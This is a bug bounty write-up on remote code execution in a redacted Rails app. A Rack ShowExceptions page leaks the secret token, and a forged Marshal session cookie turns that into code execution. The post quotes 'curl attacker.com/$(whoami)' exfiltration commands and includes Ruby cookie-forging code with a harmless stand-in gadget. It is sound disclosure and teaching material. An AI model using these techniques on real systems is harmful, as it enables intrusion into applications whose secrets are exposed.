A few days back I started testing a private bug bounty program and found a straightforward RCE on it. I chose to start hunting on the main web app, i.e. https://app.redacted.com. While going through it I found an endpoint that downloads a CSV report via redacted.redacted.com (an in-scope asset). The filename and its content were defined in the request itself.
I was fuzzing around with the parameters. When I passed %0D to file_name, the server threw an exception, and the exception page was rendered because Rack's ShowExceptions middleware was enabled.
It's more than something
As Rack's own documentation warns, "Be careful when you use this on public-facing sites as it could reveal information helpful to attackers". It must not be enabled in a production environment. Rails up to 4.0 kept a secret token in /config/initializers/secret_token.rb (Rails 4.1 moved the secret, by then called secret_key_base, into config/secrets.yml). This token is the HMAC key used to sign, and so to verify the integrity of, every signed cookie the Rails application sets, including the session cookie. At request time Rails also places it in the Rack environment under the key `action_dispatch.secret_token`, and the ShowExceptions page dumps the whole Rack environment, so the token is leaked together with the stack trace. Because the cookie session store deserializes the session with Marshal once the signature checks out, anyone holding the token can sign a malicious serialized object and turn it into RCE ( https://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/ ). Read that post to understand how the attack works.
I quickly used the code from that post to generate a cookie that executes `curl attacker.com/$(whoami)` and got a request to attacker.com/app.
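The mechanism above, as an added example that is not code from the original post, from Rails or from the linked article: a dependency-free Ruby re-implementation of the Rails 3.x / 4.0 signed cookie session format (base64 of a Marshal payload, followed by `--` and an HMAC-SHA1 of that payload keyed with the secret token). The token value, the session contents and the `Tripwire` class are constructed for the example; `Tripwire` stands in for a real deserialization gadget and only records that its `marshal_load` hook ran, which is the point at which a real gadget chain would execute a command.

```ruby
require "openssl"
require "base64"

# Added example (not from the original post, Rails, or the linked article):
# how the Rails 3.x / 4.0 cookie session store signed and read its cookie, and
# why a leaked secret_token hands an attacker remote code execution.
#
# Cookie format: base64(Marshal.dump(session)) + "--" + hex(HMAC-SHA1(secret, data))

# Constructed stand-in for the token leaked on the exceptions page.
LEAKED_SECRET_TOKEN = "a2f3d1c4e5b6a7f8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2".freeze

def sign_cookie(secret, session)
  data = Base64.strict_encode64(Marshal.dump(session))
  "#{data}--#{OpenSSL::HMAC.hexdigest('SHA1', secret, data)}"
end

# Constant-time comparison so the signature check is not a timing oracle.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# Server side: verify the HMAC, then Marshal.load the payload. Returns nil on
# a bad signature. With the right secret the attacker's bytes reach
# Marshal.load, which will instantiate whatever classes they name.
def load_cookie(secret, cookie)
  data, digest = cookie.split("--", 2)
  return nil if data.nil? || digest.nil?
  return nil unless secure_compare(digest, OpenSSL::HMAC.hexdigest("SHA1", secret, data))
  Marshal.load(Base64.strict_decode64(data))
end

# Harmless stand-in for a deserialization gadget: marshal_load runs the moment
# Marshal.load instantiates the object. A real chain (see the linked post)
# does the same with classes already loaded in a Rails process.
$tripwire_log = []

class Tripwire
  def initialize(cmd = nil)
    @cmd = cmd
  end

  def marshal_dump
    @cmd
  end

  def marshal_load(cmd)
    @cmd = cmd
    $tripwire_log << cmd # "executes" when the server deserializes the cookie
  end
end

# Attacker side: forge a session cookie carrying the gadget, signed with the
# leaked token. Returns the cookie string the client would send.
def forge_session_cookie(secret, cmd)
  sign_cookie(secret, { "session_id" => "deadbeef", "gadget" => Tripwire.new(cmd) })
end

# Flip one byte of the payload: without the secret the HMAC still protects
# integrity, so the forged-but-tampered cookie is rejected.
def tamper(cookie)
  data, digest = cookie.split("--", 2)
  bytes = Base64.strict_decode64(data).bytes
  bytes[-1] ^= 0x01
  "#{Base64.strict_encode64(bytes.pack('C*'))}--#{digest}"
end

if __FILE__ == $PROGRAM_NAME
  cookie = forge_session_cookie(LEAKED_SECRET_TOKEN, "curl attacker.example/$(whoami)")
  load_cookie(LEAKED_SECRET_TOKEN, cookie)
  puts "gadget fired with: #{$tripwire_log.inspect}"
  puts "tampered cookie accepted? #{!load_cookie(LEAKED_SECRET_TOKEN, tamper(cookie)).nil?}"
  puts "wrong-secret cookie accepted? #{!load_cookie('not-the-token', cookie).nil?}"
end
```

The signature check is doing its job: a cookie forged without the token, or modified after signing, is rejected before `Marshal.load` ever runs. The entire security of the session store therefore rests on the secret staying secret, which is exactly what an exposed exceptions page breaks.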
That's all folks :) Shares/retweets are much appreciated. Doubts? DM me at @rootxharsh
- 16 July : Bug found and Reported
- 16 July : Triaged
- 18 July : Fixed
- 20 July : $5000 Rewarded